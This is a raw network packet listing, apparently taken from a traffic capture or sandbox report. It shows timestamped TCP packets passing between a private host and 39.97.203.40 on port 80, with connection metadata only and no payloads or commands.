                                          Aug 4, 2024 12:47:08.477303028 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.477303028 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527395964 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527439117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527476072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527525902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527545929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527571917 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527605057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527643919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527693987 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527726889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527776957 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527810097 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527859926 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527890921 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527924061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.527945042 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.527981997 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528024912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528038979 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.528064013 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528105974 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.528408051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528443098 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528510094 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.528536081 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528568983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528601885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528623104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.528655052 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.528704882 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.529206991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529254913 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529289961 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529325008 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.529367924 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529401064 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529422998 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.529453993 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529486895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529506922 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.529536009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529572010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.529592991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530004978 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530056000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530090094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530141115 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530173063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530194998 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530225992 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530257940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530280113 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530309916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530342102 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530360937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530394077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530453920 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530670881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530704021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530738115 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530755997 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530808926 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530849934 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530864000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530894995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530927896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.530949116 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.530977964 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531012058 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531030893 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.531681061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531732082 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.531774044 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531805992 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531853914 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.531917095 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.531966925 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.532025099 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.569119930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.569168091 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.569201946 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.569235086 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.569276094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.569313049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.569334984 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.615967989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616051912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616070986 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616115093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616164923 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616189003 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616241932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616271019 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616292953 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616322994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616355896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616374969 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616405010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616439104 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616458893 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616524935 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616573095 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616596937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616647005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616681099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616699934 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616728067 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616760969 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616780043 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616808891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616854906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616869926 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616899014 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616930962 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.616950989 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.616981030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617017031 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617037058 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617067099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617100000 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617120981 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617151022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617198944 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617243052 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617278099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617326021 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617352962 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617384911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617427111 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617443085 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617471933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617507935 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617527962 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617557049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617590904 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617610931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617640972 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617671967 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617692947 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617723942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617758989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.617770910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.617965937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618016005 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618037939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618071079 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618118048 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618140936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618175983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618221998 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618244886 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618278027 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618309975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618329048 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618360043 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618391991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618412971 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618443966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618478060 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618499994 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618530989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618561983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618582010 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.618613005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.618659019 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.622860909 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.622929096 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.622963905 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.622997046 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.623038054 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623074055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623094082 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.623125076 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623158932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623181105 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.623210907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623254061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:08.623267889 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.671221972 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.702128887 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:08.707293987 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.029823065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.029907942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.029946089 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.029980898 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.030087948 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.030137062 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.030165911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.030199051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.030247927 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.032044888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.032093048 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.032143116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.032161951 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.033624887 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.033658981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.033689022 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.033719063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.033771992 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.035330057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.035362959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.035396099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.035415888 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.037234068 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.037267923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.037300110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.037323952 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.037374973 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.038846016 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.038878918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.038930893 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.038953066 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.042272091 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.042319059 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.042352915 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.042397022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.042445898 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.045671940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.045720100 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.045754910 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.045789003 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.045857906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.045903921 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.045919895 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.045972109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.046017885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.046032906 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.046065092 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.046106100 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.049124002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.049173117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.049225092 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.049243927 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.050764084 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.050811052 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.050844908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.050890923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.050934076 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.052051067 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.052084923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.052117109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.052139044 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.053055048 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.053087950 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.053107977 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.053138971 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.053185940 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.054773092 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.054805994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.054837942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.054857969 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.056689024 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.056719065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.056742907 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.056775093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.056807041 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.056828976 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.058453083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.058485985 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.058507919 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.058538914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.058584929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.060219049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.060316086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.060348034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.060391903 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.061978102 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.062050104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.062098026 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.062130928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.062177896 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.063625097 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.063657999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.063689947 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.063714027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.065464020 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.065515995 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.065538883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.065568924 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.065599918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.065622091 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.067213058 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.067261934 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.067284107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.067316055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.067363024 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.068939924 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.069011927 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.069042921 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.069062948 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.075032949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.075081110 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.075118065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.075118065 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.075196981 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.076217890 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.076251984 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.076286077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.076301098 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.078150034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.078183889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.078205109 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.078217983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.078272104 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.078949928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.078986883 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.079020977 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.079034090 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.079763889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.079797029 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.079812050 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.079832077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.079879045 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.080300093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.080332994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.080364943 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.080399036 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.081824064 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.081862926 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.081888914 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.081895113 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.081944942 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.083235979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.083268881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.083300114 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.083313942 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.085002899 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.085035086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.085053921 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.085067987 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.085115910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.086648941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.086740971 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.086771011 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.086790085 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.086803913 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.086849928 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.089131117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.089164019 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.089198112 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.089211941 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.090236902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.090270996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.090281963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.090302944 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.090348005 CEST4973580192.168.2.439.97.203.40
